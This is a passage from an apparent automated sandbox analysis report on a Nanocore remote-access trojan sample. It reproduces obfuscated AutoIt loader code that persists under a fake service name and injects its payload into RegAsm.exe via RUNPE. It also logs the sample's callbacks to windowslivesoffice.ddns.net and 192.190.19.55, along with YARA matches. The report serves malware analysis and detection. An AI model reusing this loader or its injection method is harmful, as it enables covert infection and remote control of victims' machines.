(ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..3,..45..,33,..2..,..41,5..0.." , ".." ) ) ) ENDFUNC FUNC ZPLPQGYBGRDG () GLOBAL $1300820860 = 256356752 GLOBAL $T34YZVYIB3 = 3599293 FOR $E = 0 TO 2828683 MOD (3030196 , 3600226 ) IF $1300820860 = 176683708 THEN #endregion EXITLOOP STRING (1287972 + 4294142251 ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..6,..4..4..,4..1..,29..,..3..1,..45,..45,3..,3..8..,..4..1,..45,..31.." , ".." ) ) ) DIM $TJEWRRKJAQ96YDEBIBZV = 434386 $1300820860 = 176683708 ISBOOL (2151701 + 4291471136 + 851125 ) ENDIF NEXT ENDFUNC FUNC QHMGHXJZKQDS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("16,4..4,..41..,2..9..,..3..1..,..4..5,..4..5,5..,..50,35,..45,..4..6,4..5" , ".." 
) ) ) ENDFUNC GLOBAL $1300820860 = 256356752 GLOBAL $MI14JTB1SP = 2992520 FOR $E = 0 TO 3837253 IF $1300820860 = 176683708 THEN #endregion EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #region nsziBMbqjH PTR (3821692 * 2598776 + 4292133915 * 233491 ) $1300820860 = 176683708 STRING ("Yzk4VX0LZuJBt2qbtlaAepvgq9LqXiBJ96lIam" ) ENDIF NEXT FUNC RQBFMRVGXJYI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..8,..27,..4..0..,30..,41,..39.." , ".." ) ) ) ENDFUNC FUNC HGMGWWTPDNOR () GLOBAL $1300820860 = 256356752 GLOBAL $BKLQZCBPLW = 492947 FOR $E = 0 TO 3060378 IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("18,31..,..3..3..,23..,4..4,3..5,..4..6..,31" , ".." ) ) ) EXITLOOP DIM $YR3ACXQSBGBXZBI46ETW = 3229433 * 3554240 * 819568 + 2784574 + 4292975588 ENDIF IF $1300820860 = 256356752 THEN #endregion CHR (142645 ) $1300820860 = 176683708 ENDIF NEXT ENDFUNC FUNC RMOEECIWZOYF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..3..4..,..3..1,..3..8,..38..,..5,..50..,31,29..,..4..7,46..,..3..1" , ".." ) ) ) ENDFUNC FUNC QDGSBIXASIOK () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..38,31..,3..1..,..4..2.." , ".." ) ) ) ENDFUNC FUNC MSSFBHBPZKOB () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19..,46,..44,3..5,..4..0,3..3..,9..,..4..0,..19..,..46,..4..4.." , ".." ) ) ) ENDFUNC FUNC ZEBJKFZIPAFI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("21,2..,..41..,..4..7..,4..0..,3..0.." , ".." ) ) ) ENDFUNC FUNC XZRGVRFNYRGX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..3..,3..5,..40,..5..,..50..,..35..,45,..4..6,45" , ".." 
) ) ) ENDFUNC FUNC ZVTZJDNXHRPQQIM ($STR ) GLOBAL $113519199 = 256356752 GLOBAL $JVAIKJVNZJ = 3556081 FOR $E = 0 TO 482371 CHR (3033401 ) IF $113519199 = 176683708 THEN LOCAL $SPLIT = STRINGSPLIT ($ALPHABET , "" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $ALPHABET = LUXBZMCWKPOC ("A..B..CD..EFG..HIJ..K..L..M..NO..PQ..RS..T..U..V..W..XY..Zabc..de..fghi..jkl..mno..p..q..r..s..t..u..v..wx..y..z0..1..2..34..5..6..78..9.." , ".." ) $113519199 = 176683708 RANDOM (3170570 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $RESULT ISPTR ("MdWUnM2DmvZ9vMRlMDwEmfG5K8YyzTWuomWSqd0kvm11oHphqKe2zZMGF0joYDdDIDVj095INmj9oORdTQhZN45yJplA4Kv2jws" ) EXITLOOP DIM $RQQEONQMS0IGFHVOZOIW = 2269440 ENDIF IF $113519199 = 1300820860 THEN LOCAL $STRINGSPLITTED = STRINGSPLIT ($STR , "," ) ISSTRING (162997 + 3383337 * 1470645 * 1064176 ) $113519199 = 1203322726 PTR ("QSS66vrYfoF4GNlz" ) ISSTRING ("lwzXBDmZ3TEfR80NLNBm17KV5tSU0eSx6sDusjE2e8lFbY0OvV5cb99oWO1hVB9ZahjyEEvCjJh2VfThCdyfjOv7toINswhM9wE4" ) ENDIF DIM $YB3B1GCR5UORC3OVVLEQ = 3765422 * 671547 * 1819674 + 4291390693 + 4292645635 * 1791171 + 3593431 NEXT FOR $I = "1" TO UBOUND ($STRINGSPLITTED ) - "1" $RESULT &= $SPLIT [$STRINGSPLITTED [$I ] ] NEXT RETURN $RESULT ENDFUNC DIM $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK LOCAL $STARTUPDIR = @USERPROFILEDIR & "\hdwwiz" LOCAL $BOOL = @SCRIPTDIR = $STARTUPDIR "True" "False" UCZPRNKTQP ("WinSAT" , "DiagnosticsHub.StandardCollector.Service.exe" ) $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK = URQHLYEYWJ ("0x494D4A504443546C" , "0x706D41484E505A786C49734E69595578575566536C475879594457574F615A67" , "10" ) DIM $LIUIVFNQUPEO = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"" ) DIM $EMYXOKTBATHL = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"" ) IF FILEEXISTS ($LIUIVFNQUPEO ) THEN RUNPE ($LIUIVFNQUPEO , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ELSEIF FILEEXISTS ($EMYXOKTBATHL ) THEN RUNPE ($EMYXOKTBATHL , 
$IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ENDIF DJXLPTMAOK () FUNC DJXLPTMAOK ()

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 20, 2020 07:24:02.535196066 CET  49712        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:05.538395882 CET  49712        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:11.538892031 CET  49712        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:21.237142086 CET  49728        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:24.243057013 CET  49728        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:30.243840933 CET  49728        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:39.295228958 CET  49733        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:42.307034016 CET  49733        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:24:48.323229074 CET  49733        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:13.287843943 CET  49745        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:16.294404030 CET  49745        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:22.310477018 CET  49745        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:30.058449984 CET  49747        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:33.061260939 CET  49747        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:39.077476978 CET  49747        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:48.468041897 CET  49749        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:51.469167948 CET  49749        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:25:57.469616890 CET  49749        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:26:21.655730009 CET  49753        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:26:24.659368038 CET  49753        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:26:30.675429106 CET  49753        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:26:38.292778969 CET  49754        20377      192.168.2.3  192.190.19.55
Nov 20, 2020 07:26:41.303071976 CET  49754        20377      192.168.2.3  192.190.19.55

                                                  UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 20, 2020 07:23:51.359072924 CET  58361        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:23:51.386352062 CET  53           58361      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:02.489017963 CET  63492        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:02.524512053 CET  53           63492      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:03.363210917 CET  60831        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:03.398821115 CET  53           60831      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:04.089700937 CET  60100        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:04.124996901 CET  53           60100      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:04.785423994 CET  53195        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:04.820997000 CET  53           53195      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:05.545089960 CET  50141        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:05.572156906 CET  53           50141      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:06.271161079 CET  53023        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:06.298481941 CET  53           53023      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:06.989762068 CET  49563        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:07.017035007 CET  53           49563      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:07.745724916 CET  51352        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:07.781692028 CET  53           51352      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:08.488189936 CET  59349        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:08.515381098 CET  53           59349      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:09.210068941 CET  57084        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:09.237176895 CET  53           57084      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:09.927449942 CET  58823        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:09.965109110 CET  53           58823      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:10.627311945 CET  57568        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:10.654616117 CET  53           57568      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:11.423109055 CET  50540        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:11.450406075 CET  53           50540      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:15.116482019 CET  54366        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:15.143910885 CET  53           54366      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:18.898690939 CET  53034        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:18.925915956 CET  53           53034      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:21.197740078 CET  57762        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:21.235414982 CET  53           57762      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:25.472790956 CET  55435        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:25.512496948 CET  53           55435      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:36.823493958 CET  50713        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:36.850688934 CET  53           50713      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:39.256642103 CET  56132        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:39.292143106 CET  53           56132      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:53.767348051 CET  58987        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:53.794534922 CET  53           58987      8.8.8.8      192.168.2.3
Nov 20, 2020 07:24:58.781589985 CET  56579        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:24:58.818485022 CET  53           56579      8.8.8.8      192.168.2.3
Nov 20, 2020 07:25:13.250663042 CET  60633        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:25:13.285912037 CET  53           60633      8.8.8.8      192.168.2.3
Nov 20, 2020 07:25:28.846604109 CET  61292        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:25:28.873666048 CET  53           61292      8.8.8.8      192.168.2.3
Nov 20, 2020 07:25:30.020796061 CET  63619        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:25:30.056556940 CET  53           63619      8.8.8.8      192.168.2.3
Nov 20, 2020 07:25:30.586656094 CET  64938        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:25:30.613744020 CET  53           64938      8.8.8.8      192.168.2.3
Nov 20, 2020 07:25:48.431196928 CET  61946        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:25:48.466545105 CET  53           61946      8.8.8.8      192.168.2.3
Nov 20, 2020 07:26:21.617285967 CET  64910        53         192.168.2.3  8.8.8.8
Nov 20, 2020 07:26:21.654969931 CET  53           64910      8.8.8.8      192.168.2.3
Nov 20, 2020 07:26:38.247783899 CET  52123        53         192.168.2.3  8.8.8.8
                                                  Nov 20, 2020 07:26:38.283476114 CET53521238.8.8.8192.168.2.3

                                                  DNS Queries

                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                  Nov 20, 2020 07:24:02.489017963 CET | 192.168.2.3 | 8.8.8.8 | 0xa060 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:24:21.197740078 CET | 192.168.2.3 | 8.8.8.8 | 0x4378 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:24:39.256642103 CET | 192.168.2.3 | 8.8.8.8 | 0x41ac | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:25:13.250663042 CET | 192.168.2.3 | 8.8.8.8 | 0x12fc | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:25:30.020796061 CET | 192.168.2.3 | 8.8.8.8 | 0xf013 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:25:48.431196928 CET | 192.168.2.3 | 8.8.8.8 | 0x4718 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:26:21.617285967 CET | 192.168.2.3 | 8.8.8.8 | 0x62c8 | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:26:38.247783899 CET | 192.168.2.3 | 8.8.8.8 | 0x892a | Standard query (0) | windowslivesoffice.ddns.net | A (IP address) | IN (0x0001)

                                                  DNS Answers

                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                  Nov 20, 2020 07:24:02.524512053 CET | 8.8.8.8 | 192.168.2.3 | 0xa060 | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:24:21.235414982 CET | 8.8.8.8 | 192.168.2.3 | 0x4378 | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:24:39.292143106 CET | 8.8.8.8 | 192.168.2.3 | 0x41ac | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:25:13.285912037 CET | 8.8.8.8 | 192.168.2.3 | 0x12fc | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:25:30.056556940 CET | 8.8.8.8 | 192.168.2.3 | 0xf013 | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:25:48.466545105 CET | 8.8.8.8 | 192.168.2.3 | 0x4718 | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:26:21.654969931 CET | 8.8.8.8 | 192.168.2.3 | 0x62c8 | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)
                                                  Nov 20, 2020 07:26:38.283476114 CET | 8.8.8.8 | 192.168.2.3 | 0x892a | No error (0) | windowslivesoffice.ddns.net |  | 192.190.19.55 | A (IP address) | IN (0x0001)

                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage


                                                  Memory Usage


                                                  High Level Behavior Distribution


                                                  Behavior


                                                  System Behavior

                                                  General

                                                  Start time: 07:23:57
                                                  Start date: 20/11/2020
                                                  Path: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: 'C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe'
                                                  Imagebase: 0x8f0000
                                                  File size: 1124920 bytes
                                                  MD5 hash: 5162337B6FD4C8806EF62F6EBF4A5DF8
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Reputation: low

                                                  General

                                                  Start time: 07:24:00
                                                  Start date: 20/11/2020
                                                  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                  Imagebase: 0x660000
                                                  File size: 53248 bytes
                                                  MD5 hash: 529695608EAFBED00ACA9E61EF333A7C
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: .Net C# or VB.NET
                                                  Reputation: high

                                                  General

                                                  Start time: 07:24:07
                                                  Start date: 20/11/2020
                                                  Path: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                  Wow64 process (32bit): true
                                                  Commandline: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
                                                  Imagebase: 0x3c0000
                                                  File size: 1124928 bytes
                                                  MD5 hash: F660ED54597E4FF5354B557329CAB70D
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
